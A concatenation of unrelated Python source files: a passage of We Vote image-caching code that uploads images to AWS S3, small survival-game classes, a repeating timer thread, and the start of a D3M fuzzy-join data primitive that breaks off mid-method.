if twitter_profile_banner_url_https:
cache_all_kind_of_images_results['cached_twitter_banner_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=twitter_profile_banner_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, twitter_id=twitter_id,
twitter_screen_name=twitter_screen_name, is_active_version=True,
kind_of_image_twitter_banner=True, kind_of_image_original=True)
if facebook_profile_image_url_https:
cache_all_kind_of_images_results['cached_facebook_profile_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=facebook_profile_image_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, facebook_user_id=facebook_user_id,
is_active_version=True, kind_of_image_facebook_profile=True, kind_of_image_original=True)
if facebook_background_image_url_https:
cache_all_kind_of_images_results['cached_facebook_background_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=facebook_background_image_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, facebook_user_id=facebook_user_id,
is_active_version=True, kind_of_image_facebook_background=True,
facebook_background_image_offset_x=facebook_background_image_offset_x,
facebook_background_image_offset_y=facebook_background_image_offset_y,
kind_of_image_original=True)
if maplight_image_url_https:
cache_all_kind_of_images_results['cached_maplight_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=maplight_image_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, maplight_id=maplight_id,
is_active_version=True, kind_of_image_maplight=True, kind_of_image_original=True)
if vote_smart_image_url_https:
cache_all_kind_of_images_results['cached_vote_smart_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=vote_smart_image_url_https,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, vote_smart_id=vote_smart_id,
is_active_version=True, kind_of_image_vote_smart=True, kind_of_image_original=True)
if ballotpedia_profile_image_url:
cache_all_kind_of_images_results['cached_ballotpedia_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=ballotpedia_profile_image_url,
voter_we_vote_id=voter_we_vote_id,
candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id,
is_active_version=True,
kind_of_image_ballotpedia_profile=True,
kind_of_image_original=True)
if linkedin_profile_image_url:
cache_all_kind_of_images_results['cached_linkedin_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=linkedin_profile_image_url,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, is_active_version=True,
kind_of_image_linkedin_profile=True, kind_of_image_original=True)
if wikipedia_profile_image_url:
cache_all_kind_of_images_results['cached_wikipedia_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=wikipedia_profile_image_url,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, is_active_version=True,
kind_of_image_wikipedia_profile=True, kind_of_image_original=True)
if other_source_image_url:
cache_all_kind_of_images_results['cached_other_source_image'] = cache_image_if_not_cached(
google_civic_election_id=google_civic_election_id,
image_url_https=other_source_image_url,
voter_we_vote_id=voter_we_vote_id, candidate_we_vote_id=candidate_we_vote_id,
organization_we_vote_id=organization_we_vote_id, is_active_version=True,
kind_of_image_other_source=True, kind_of_image_original=True, other_source=other_source)
return cache_all_kind_of_images_results
def cache_issue_image_master(google_civic_election_id, issue_image_file, issue_we_vote_id=None,
kind_of_image_issue=False, kind_of_image_original=False):
"""
Cache master issue image to AWS. This function is a more focused version of cache_image_locally (which deals with
all of the standard photos like Facebook, or Twitter).
:param google_civic_election_id:
:param issue_image_file:
:param issue_we_vote_id:
:param kind_of_image_issue:
:param kind_of_image_original:
:return:
"""
we_vote_parent_image_id = None
success = False
status = ''
is_active_version = True
we_vote_image_created = False
image_url_valid = False
image_stored_from_source = False
image_stored_to_aws = False
image_versions = []
we_vote_image_manager = WeVoteImageManager()
# create we_vote_image entry with issue_we_vote_id and google_civic_election_id and kind_of_image
create_we_vote_image_results = we_vote_image_manager.create_we_vote_image(
google_civic_election_id=google_civic_election_id,
issue_we_vote_id=issue_we_vote_id,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_original=kind_of_image_original)
status += create_we_vote_image_results['status']
if not create_we_vote_image_results['we_vote_image_saved']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
return error_results
we_vote_image_created = True
we_vote_image = create_we_vote_image_results['we_vote_image']
# image file validation and get source image properties
analyze_source_images_results = analyze_image_file(issue_image_file)
if not analyze_source_images_results['image_url_valid']:
error_results = {
'success': success,
'status': status + " IMAGE_URL_NOT_VALID",
'we_vote_image_created': True,
'image_url_valid': False,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_url_valid = True
status += " IMAGE_URL_VALID"
image_width = analyze_source_images_results['image_width']
image_height = analyze_source_images_results['image_height']
image_format = analyze_source_images_results['image_format']
# Get today's cached images and their versions so that image version can be calculated
cached_todays_we_vote_image_list_results = we_vote_image_manager.retrieve_todays_cached_we_vote_image_list(
issue_we_vote_id=issue_we_vote_id,
kind_of_image_issue=kind_of_image_issue,
kind_of_image_original=kind_of_image_original)
for cached_we_vote_image in cached_todays_we_vote_image_list_results['we_vote_image_list']:
if cached_we_vote_image.same_day_image_version:
image_versions.append(cached_we_vote_image.same_day_image_version)
if image_versions:
same_day_image_version = max(image_versions) + 1
else:
same_day_image_version = 1
image_stored_from_source = True
date_image_saved = "{year}{:02d}{:02d}".format(we_vote_image.date_image_saved.month,
we_vote_image.date_image_saved.day,
year=we_vote_image.date_image_saved.year)
# ex issue_image_master-2017210_1_48x48.png
we_vote_image_file_name = "{image_type}_{master_image}-{date_image_saved}_{counter}_" \
"{image_width}x{image_height}.{image_format}" \
"".format(image_type=ISSUE_IMAGE_NAME,
master_image=MASTER_IMAGE, date_image_saved=date_image_saved,
counter=str(same_day_image_version),
image_width=str(image_width),
image_height=str(image_height),
image_format=str(image_format))
we_vote_image_file_location = issue_we_vote_id + "/" + we_vote_image_file_name
image_stored_to_aws = we_vote_image_manager.store_image_file_to_aws(
issue_image_file, we_vote_image_file_location)
if not image_stored_to_aws:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_TO_AWS",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': False,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
we_vote_image_url = "https://{bucket_name}.s3.amazonaws.com/{we_vote_image_file_location}" \
"".format(bucket_name=AWS_STORAGE_BUCKET_NAME,
we_vote_image_file_location=we_vote_image_file_location)
save_aws_info = we_vote_image_manager.save_we_vote_image_aws_info(we_vote_image, we_vote_image_url,
we_vote_image_file_location,
we_vote_parent_image_id, is_active_version)
status += " IMAGE_STORED_TO_AWS " + save_aws_info['status']
success = save_aws_info['success']
if not success:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
save_source_info_results = we_vote_image_manager.save_we_vote_image_issue_info(
we_vote_image, analyze_source_images_results['image_width'],
analyze_source_images_results['image_height'], we_vote_image.we_vote_image_url,
same_day_image_version, image_url_valid)
status += " " + save_source_info_results['status']
if not save_source_info_results['success']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': False,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
# set active version False for other master images for same candidate/organization
set_active_version_false_results = we_vote_image_manager.set_active_version_false_for_other_images(
issue_we_vote_id=issue_we_vote_id,
image_url_https=we_vote_image.we_vote_image_url,
kind_of_image_issue=True)
results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': we_vote_image
}
return results
def cache_organization_sharing_image(
python_image_library_image=None,
organization_we_vote_id=None,
kind_of_image_original=False,
kind_of_image_chosen_favicon=False,
kind_of_image_chosen_logo=False,
kind_of_image_chosen_social_share_master=False):
"""
Cache master "chosen" images to AWS. This function is a more focused version of cache_image_locally
(which deals with all of the standard profile photos like Facebook, or Twitter).
:param python_image_library_image:
:param organization_we_vote_id:
:param kind_of_image_original:
:param kind_of_image_chosen_favicon:
:param kind_of_image_chosen_logo:
:param kind_of_image_chosen_social_share_master:
:return:
"""
we_vote_parent_image_id = None
success = False
status = ''
is_active_version = True
we_vote_image_created = False
image_url_valid = False
image_stored_from_source = False
image_stored_to_aws = False
image_versions = []
we_vote_image_manager = WeVoteImageManager()
create_we_vote_image_results = we_vote_image_manager.create_we_vote_image(
organization_we_vote_id=organization_we_vote_id,
kind_of_image_chosen_favicon=kind_of_image_chosen_favicon,
kind_of_image_chosen_logo=kind_of_image_chosen_logo,
kind_of_image_chosen_social_share_master=kind_of_image_chosen_social_share_master,
kind_of_image_original=kind_of_image_original)
status += create_we_vote_image_results['status']
if not create_we_vote_image_results['we_vote_image_saved']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
return error_results
we_vote_image_created = True
we_vote_image = create_we_vote_image_results['we_vote_image']
# image file validation and get source image properties
analyze_source_images_results = analyze_image_in_memory(python_image_library_image)
if not analyze_source_images_results['image_url_valid']:
error_results = {
'success': success,
'status': status + " IMAGE_URL_NOT_VALID ",
'we_vote_image_created': True,
'image_url_valid': False,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_url_valid = True
status += " IMAGE_URL_VALID "
image_width = analyze_source_images_results['image_width']
image_height = analyze_source_images_results['image_height']
image_format = analyze_source_images_results['image_format']
# Get today's cached images and their versions so that image version can be calculated
cached_todays_we_vote_image_list_results = we_vote_image_manager.retrieve_todays_cached_we_vote_image_list(
organization_we_vote_id=organization_we_vote_id,
kind_of_image_chosen_favicon=kind_of_image_chosen_favicon,
kind_of_image_chosen_logo=kind_of_image_chosen_logo,
kind_of_image_chosen_social_share_master=kind_of_image_chosen_social_share_master,
kind_of_image_original=kind_of_image_original)
for cached_we_vote_image in cached_todays_we_vote_image_list_results['we_vote_image_list']:
if cached_we_vote_image.same_day_image_version:
image_versions.append(cached_we_vote_image.same_day_image_version)
if image_versions:
same_day_image_version = max(image_versions) + 1
else:
same_day_image_version = 1
image_stored_from_source = True
date_image_saved = "{year}{:02d}{:02d}".format(we_vote_image.date_image_saved.month,
we_vote_image.date_image_saved.day,
year=we_vote_image.date_image_saved.year)
if kind_of_image_chosen_favicon:
image_type = CHOSEN_FAVICON_NAME
elif kind_of_image_chosen_logo:
image_type = CHOSEN_LOGO_NAME
elif kind_of_image_chosen_social_share_master:
image_type = CHOSEN_SOCIAL_SHARE_IMAGE_NAME
else:
image_type = 'organization_sharing'
if kind_of_image_original:
master_image = MASTER_IMAGE
else:
master_image = 'calculated'
# ex issue_image_master-2017210_1_48x48.png
we_vote_image_file_name = "{image_type}_{master_image}-{date_image_saved}_{counter}_" \
"{image_width}x{image_height}.{image_format}" \
"".format(image_type=image_type,
master_image=master_image,
date_image_saved=date_image_saved,
counter=str(same_day_image_version),
image_width=str(image_width),
image_height=str(image_height),
image_format=str(image_format))
we_vote_image_file_location = organization_we_vote_id + "/" + we_vote_image_file_name
image_stored_locally = we_vote_image_manager.store_python_image_locally(
python_image_library_image, we_vote_image_file_name)
if not image_stored_locally:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_LOCALLY ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_locally': False,
'image_stored_to_aws': image_stored_to_aws,
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
image_stored_to_aws = we_vote_image_manager.store_image_to_aws(
we_vote_image_file_name, we_vote_image_file_location, image_format)
if not image_stored_to_aws:
error_results = {
'success': success,
'status': status + " IMAGE_NOT_STORED_TO_AWS ",
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': False,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
we_vote_image_url = "https://{bucket_name}.s3.amazonaws.com/{we_vote_image_file_location}" \
"".format(bucket_name=AWS_STORAGE_BUCKET_NAME,
we_vote_image_file_location=we_vote_image_file_location)
save_aws_info = we_vote_image_manager.save_we_vote_image_aws_info(we_vote_image, we_vote_image_url,
we_vote_image_file_location,
we_vote_parent_image_id, is_active_version)
status += " IMAGE_STORED_TO_AWS " + save_aws_info['status']
success = save_aws_info['success']
if not success:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
save_source_info_results = we_vote_image_manager.save_we_vote_image_organization_share_info(
we_vote_image, analyze_source_images_results['image_width'],
analyze_source_images_results['image_height'], we_vote_image.we_vote_image_url,
same_day_image_version, image_url_valid,
kind_of_image_chosen_favicon=kind_of_image_chosen_favicon, kind_of_image_chosen_logo=kind_of_image_chosen_logo,
kind_of_image_chosen_social_share_master=kind_of_image_chosen_social_share_master)
status += " " + save_source_info_results['status']
if not save_source_info_results['success']:
error_results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': False,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': None
}
delete_we_vote_image_results = we_vote_image_manager.delete_we_vote_image(we_vote_image)
return error_results
# set active version False for other master images for same candidate/organization
set_active_version_false_results = we_vote_image_manager.set_active_version_false_for_other_images(
organization_we_vote_id=organization_we_vote_id,
image_url_https=we_vote_image.we_vote_image_url,
kind_of_image_chosen_favicon=kind_of_image_chosen_favicon,
kind_of_image_chosen_logo=kind_of_image_chosen_logo,
kind_of_image_chosen_social_share_master=kind_of_image_chosen_social_share_master)
status += set_active_version_false_results['status']
results = {
'success': success,
'status': status,
'we_vote_image_created': we_vote_image_created,
'image_url_valid': image_url_valid,
'image_stored_from_source': image_stored_from_source,
'image_stored_to_aws': image_stored_to_aws,
'we_vote_image': we_vote_image
}
return results
|
from dataclasses import dataclass
from enum import Enum
@dataclass
class Message:
_type: str
data: dict
class Survivor:
def __init__(
self,
id,
woodcutting=None,
foraging=None,
first_aid=None,
crafting=None,
cooking=None,
fighting=None,
):
self.id = id
self.woodcutting = woodcutting or 1
self.foraging = foraging or 1
self.first_aid = first_aid or 1
self.crafting = crafting or 1
self.cooking = cooking or 1
self.fighting = fighting or 1
class SurvivorGroup:
def __init__(self, survivors=None):
self.survivors = survivors or []
class World:
def __init__(self):
self.weather = "Raining"
class Time:
class PHASE(Enum):
MORNING = 1
AFTERNOON = 2
NIGHT = 3
def __init__(self):
self.epoch = 0
self.phase = self.PHASE.MORNING
def move(self):
self.epoch += 1
self.phase = self.PHASE.AFTERNOON
|
"""Module containing class `RepeatingTimer`."""
from threading import Thread, Timer
class RepeatingTimer(Thread):
"""Timer that fires repeatedly."""
def __init__(self, interval, function, args=None, kwargs=None):
super().__init__()
self._interval = interval
self._function = function
self._args = args if args is not None else {}
self._kwargs = kwargs if kwargs is not None else {}
self._timer = None
self._started = False
def start(self):
if self._started:
raise ValueError('RepeatingTimer can be started only once.')
else:
self._start_timer()
def _start_timer(self):
self._timer = Timer(self._interval, self._tick)
self._timer.start()
def _tick(self):
self._function(*self._args, **self._kwargs)
self._start_timer()
def cancel(self):
if self._timer is not None:
self._timer.cancel()
|
#
# Copyright © 2021 Uncharted Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import typing
import os
import collections
import pandas as pd # type: ignore
import numpy as np
import haversine as hs
from joblib import Parallel, delayed
from d3m import container, exceptions, utils as d3m_utils
from d3m.base import utils as d3m_base_utils
from d3m.metadata import base as metadata_base, hyperparams
from d3m.primitive_interfaces import base, transformer
from rapidfuzz import process
from haversine import Unit
from dateutil import parser
import version
__all__ = ("FuzzyJoinPrimitive",)
Inputs = container.Dataset
Outputs = container.Dataset
class Hyperparams(hyperparams.Hyperparams):
n_jobs = hyperparams.Hyperparameter[int](
default=-1,
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="The value of the n_jobs parameter for the joblib library",
)
left_col = hyperparams.Union[typing.Union[str, typing.Sequence[str]]](
configuration=collections.OrderedDict(
set=hyperparams.Set(
elements=hyperparams.Hyperparameter[str](
default="",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Name of the column.",
),
default=(),
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="A set of column indices to force primitive to operate on. If any specified column cannot be parsed, it is skipped.",
),
str=hyperparams.Hyperparameter[str](
default="",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Name of the column.",
),
),
default="str",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Columns to join on from left dataframe",
)
right_col = hyperparams.Union[typing.Union[str, typing.Sequence[str]]](
configuration=collections.OrderedDict(
set=hyperparams.Set(
elements=hyperparams.Hyperparameter[str](
default="",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Name of the column.",
),
default=(),
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="A set of column indices to force primitive to operate on. If any specified column cannot be parsed, it is skipped.",
),
str=hyperparams.Hyperparameter[str](
default="",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Name of the column.",
),
),
default="str",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Columns to join on from right dataframe",
)
accuracy = hyperparams.Union[typing.Union[float, typing.Sequence[float]]](
configuration=collections.OrderedDict(
set=hyperparams.List(
elements=hyperparams.Hyperparameter[float](-1),
default=(),
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="A list of accuracies, corresponding respectively to the columns to join on.",
),
float=hyperparams.Hyperparameter[float](0),
),
default="float",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Required accuracy of join ranging from 0.0 to 1.0, where 1.0 is an exact match.",
)
join_type = hyperparams.Enumeration[str](
default="left",
values=("left", "right", "outer", "inner", "cross"),
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="The type of join between two dataframes.",
)
absolute_accuracy = hyperparams.Union[typing.Union[bool, typing.Sequence[bool]]](
configuration=collections.OrderedDict(
set=hyperparams.List(
elements=hyperparams.UniformBool(False),
default=(),
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="A list of flags for absolute values, corresponding respectively to the columns to join on.",
),
bool=hyperparams.UniformBool(False),
),
default="bool",
semantic_types=[
"https://metadata.datadrivendiscovery.org/types/ControlParameter"
],
description="Used for numeric to use absolute comparison instead of percentage.",
)
class FuzzyJoinPrimitive(
transformer.TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]
):
"""
Place holder fuzzy join primitive
"""
_STRING_JOIN_TYPES = set(
(
"https://metadata.datadrivendiscovery.org/types/CategoricalData",
"http://schema.org/Text",
"http://schema.org/Boolean",
)
)
_NUMERIC_JOIN_TYPES = set(("http://schema.org/Integer", "http://schema.org/Float"))
_VECTOR_JOIN_TYPES = set(
("https://metadata.datadrivendiscovery.org/types/FloatVector",)
)
_GEO_JOIN_TYPES = set(
("https://metadata.datadrivendiscovery.org/types/BoundingPolygon",)
)
_DATETIME_JOIN_TYPES = set(("http://schema.org/DateTime",))
_SUPPORTED_TYPES = (
_STRING_JOIN_TYPES.union(_NUMERIC_JOIN_TYPES)
.union(_DATETIME_JOIN_TYPES)
.union(_VECTOR_JOIN_TYPES)
.union(_GEO_JOIN_TYPES)
)
__author__ = ("Uncharted Software",)
metadata = metadata_base.PrimitiveMetadata(
{
"id": "6c3188bf-322d-4f9b-bb91-68151bf1f17f",
"version": version.__version__,
"name": "Fuzzy Join Placeholder",
"python_path": "d3m.primitives.data_transformation.fuzzy_join.DistilFuzzyJoin",
"keywords": ["join", "columns", "dataframe"],
"source": {
"name": "Uncharted Software",
"contact": "mailto:cbethune@uncharted.software",
"uris": [
"https://github.com/uncharted-distil/distil-primitives-contrib/blob/main/main/distil_primitives_contrib/fuzzy_join.py",
"https://github.com/uncharted-distil/distil-primitives-contrib",
],
},
"installation": [
{
"type": metadata_base.PrimitiveInstallationType.PIP,
"package_uri": "git+https://github.com/uncharted-distil/distil-primitives-contrib.git@{git_commit}#egg=distil-primitives-contrib".format(
git_commit=d3m_utils.current_git_commit(
os.path.dirname(__file__)
),
),
},
],
"algorithm_types": [
metadata_base.PrimitiveAlgorithmType.ARRAY_CONCATENATION,
],
"primitive_family": metadata_base.PrimitiveFamily.DATA_TRANSFORMATION,
}
)
def produce(
self,
*,
left: Inputs, # type: ignore
right: Inputs, # type: ignore
timeout: float = None,
iterations: int = None,
) -> base.CallResult[Outputs]:
# attempt to extract the main table
try:
left_resource_id, left_df = d3m_base_utils.get_tabular_resource(left, None)
except ValueError as error:
raise exceptions.InvalidArgumentValueError(
"Failure to find tabular resource in left dataset"
) from error
try:
right_resource_id, right_df = d3m_base_utils.get_tabular_resource(
right, None
)
except ValueError as error:
raise exceptions.InvalidArgumentValueError(
"Failure to find tabular resource in right dataset"
) from error
accuracy = self.hyperparams["accuracy"]
absolute_accuracy = self.hyperparams["absolute_accuracy"]
# hyperparams may be parsed as tuples
# floats could be integers if round number is passed in
if isinstance(accuracy, collections.Iterable):
accuracy = [float(a) for a in accuracy]
else:
accuracy = float(accuracy)
if isinstance(absolute_accuracy, collections.Iterable):
absolute_accuracy = list(absolute_accuracy)
if type(accuracy) == float and not type(absolute_accuracy) == bool:
raise exceptions.InvalidArgumentValueError(
"only 1 value of accuracy provided, but multiple values for absolute accuracy provided"
)
if (not type(accuracy) == float) and type(absolute_accuracy) == bool:
raise exceptions.InvalidArgumentValueError(
"only 1 for absolute accuracy provided, but multiple values of accuracy provided"
)
if type(accuracy) == float and not absolute_accuracy:
if accuracy <= 0.0 or accuracy > 1.0:
raise exceptions.InvalidArgumentValueError(
"accuracy of " + str(accuracy) + " is out of range"
)
elif type(accuracy) == list and type(absolute_accuracy) == list:
if not len(accuracy) == len(absolute_accuracy):
raise exceptions.InvalidArgumentValueError(
"the count of accuracy hyperparams does not match the count of absolute_accuracy hyperparams"
)
for i in range(len(accuracy)):
if (accuracy[i] <= 0.0 or accuracy[i] > 1.0) and not absolute_accuracy[i]:
raise exceptions.InvalidArgumentValueError(
"accuracy of " + str(acc) + " is out of range"
)
left_col = self.hyperparams["left_col"]
right_col = self.hyperparams["right_col"]
if type(left_col) != type(right_col) or (
type(left_col) == list
and len(left_col) != len(right_col)
and type(accuracy) != list
and len(accuracy) != len(left_col)
):
raise exceptions.InvalidArgumentTypeError(
"both left_col and right_col need to have same data type and if they are lists, the same list lengths"
)
if type(left_col) == str:
left_col = [left_col]
right_col = [right_col]
accuracy = [accuracy]
absolute_accuracy = [absolute_accuracy]
join_types = [
self._get_join_semantic_type(
left,
left_resource_id,
left_col[i],
right,
right_resource_id,
right_col[i],
)
for i in range(len(left_col))
]
num_splits = 32
joined_split = [None for i in range(num_splits)]
left_df_split = np.array_split(left_df, num_splits)
jobs = [delayed(self._produce_threaded)(
index = i,
left_df_full = left_df,
left_dfs = left_df_split,
right_df = right_df,
join_types = join_types,
left_col = left_col,
right_col = right_col,
accuracy = accuracy,
absolute_accuracy = absolute_accuracy
) for i in range(num_splits)]
joined_data = Parallel(n_jobs=self.hyperparams["n_jobs"], backend="loky", verbose=10)(jobs)
# joined data needs to maintain order to mimic none split joining
for i, d in joined_data:
joined_split[i] = d
joined = pd.concat(joined_split, ignore_index = True)
# create a new dataset to hold the joined data
resource_map = {}
float_vector_columns = {}
for resource_id, resource in left.items(): # type: ignore
if resource_id == left_resource_id:
for column in joined.columns:
# need to avoid bug in container.Dataset, it doesn't like vector columns
if type(joined[column].iloc[0]) == np.ndarray:
float_vector_columns[column] = joined[column]
joined[column] = np.NAN
resource_map[resource_id] = joined
else:
resource_map[resource_id] = resource
# Generate metadata for the dataset using only the first row of the resource for speed -
# metadata generation runs over each cell in the dataframe, but we only care about column
# level generation. Once that's done, set the actual dataframe value.
result_dataset = container.Dataset(
{k: v.head(1) for k, v in resource_map.items()}, generate_metadata=True
)
for k, v in resource_map.items():
result_dataset[k] = v
result_dataset.metadata = result_dataset.metadata.update(
(k,), {"dimension": {"length": v.shape[0]}}
)
for key in float_vector_columns.keys():
df = result_dataset[left_resource_id]
df[key] = float_vector_columns[key]
float_vec_loc = df.columns.get_loc(key)
float_vec_col_indices = df.metadata.list_columns_with_semantic_types(
("https://metadata.datadrivendiscovery.org/types/FloatVector",)
)
if float_vec_loc not in float_vec_col_indices:
df.metadata = df.metadata.add_semantic_type(
(metadata_base.ALL_ELEMENTS, float_vec_loc),
"https://metadata.datadrivendiscovery.org/types/FloatVector",
)
return base.CallResult(result_dataset)
def _produce_threaded(
self,
*,
index: int,
left_df_full: container.DataFrame, # type: ignore
left_dfs: typing.Sequence[container.DataFrame], # type: ignore
right_df: container.DataFrame, # type: ignore
join_types: typing.Sequence[str],
left_col: typing.Sequence[int],
right_col: typing.Sequence[int],
accuracy: typing.Sequence[float],
absolute_accuracy: typing.Sequence[bool]
) -> typing.Tuple[int, base.CallResult[Outputs]]:
if left_dfs[index].empty:
return (index, None)
output = self._produce(
left_df_full = left_df_full,
left_df = left_dfs[index].reset_index(drop=True),
right_df = right_df.copy(),
join_types = join_types,
left_col = left_col,
right_col = right_col,
accuracy = accuracy,
absolute_accuracy = absolute_accuracy
)
return (index, output)
def _produce(
self,
*,
left_df_full: container.DataFrame, # type: ignore
left_df: container.DataFrame, # type: ignore
right_df: container.DataFrame, # type: ignore
join_types: typing.Sequence[str],
left_col: typing.Sequence[int],
right_col: typing.Sequence[int],
accuracy: typing.Sequence[float],
absolute_accuracy: typing.Sequence[bool]
) -> base.CallResult[Outputs]:
# cycle through the columns to join the dataframes
right_cols_to_drop = []
new_left_cols = []
new_right_cols = []
for col_index in range(len(left_col)):
# depending on the joining type, make a new dataframe that has columns we will want to merge on
# keep track of which columns we will want to drop later on
if len(self._STRING_JOIN_TYPES.intersection(join_types[col_index])) > 0:
new_left_df = self._create_string_merge_cols(
left_df,
left_col[col_index],
right_df,
right_col[col_index],
accuracy[col_index],
col_index,
)
left_df[new_left_df.columns] = new_left_df
right_name = "righty_string" + str(col_index)
right_df.rename(
columns={right_col[col_index]: right_name}, inplace=True
)
new_left_cols += list(new_left_df.columns)
new_right_cols.append(right_name)
elif len(self._NUMERIC_JOIN_TYPES.intersection(join_types[col_index])) > 0:
new_left_df = self._create_numeric_merge_cols(
left_df,
left_col[col_index],
right_df,
right_col[col_index],
accuracy[col_index],
col_index,
absolute_accuracy[col_index],
)
left_df[new_left_df.columns] = new_left_df
right_name = "righty_numeric" + str(col_index)
right_df.rename(
columns={right_col[col_index]: right_name}, inplace=True
)
new_left_cols += list(new_left_df.columns)
new_right_cols.append(right_name)
elif len(self._GEO_JOIN_TYPES.intersection(join_types[col_index])) > 0:
new_left_df, new_right_df = self._create_geo_vector_merging_cols(
left_df,
left_col[col_index],
right_df,
right_col[col_index],
accuracy[col_index],
col_index,
absolute_accuracy[col_index],
)
left_df[new_left_df.columns] = new_left_df
right_df[new_right_df.columns] = new_right_df
new_left_cols += list(new_left_df.columns)
new_right_cols += list(new_right_df.columns)
right_cols_to_drop.append(right_col[col_index])
elif len(self._VECTOR_JOIN_TYPES.intersection(join_types[col_index])) > 0:
new_left_df, new_right_df = self._create_vector_merging_cols(
left_df,
left_col[col_index],
right_df,
right_col[col_index],
accuracy[col_index],
col_index,
absolute_accuracy[col_index],
)
left_df[new_left_df.columns] = new_left_df
right_df[new_right_df.columns] = new_right_df
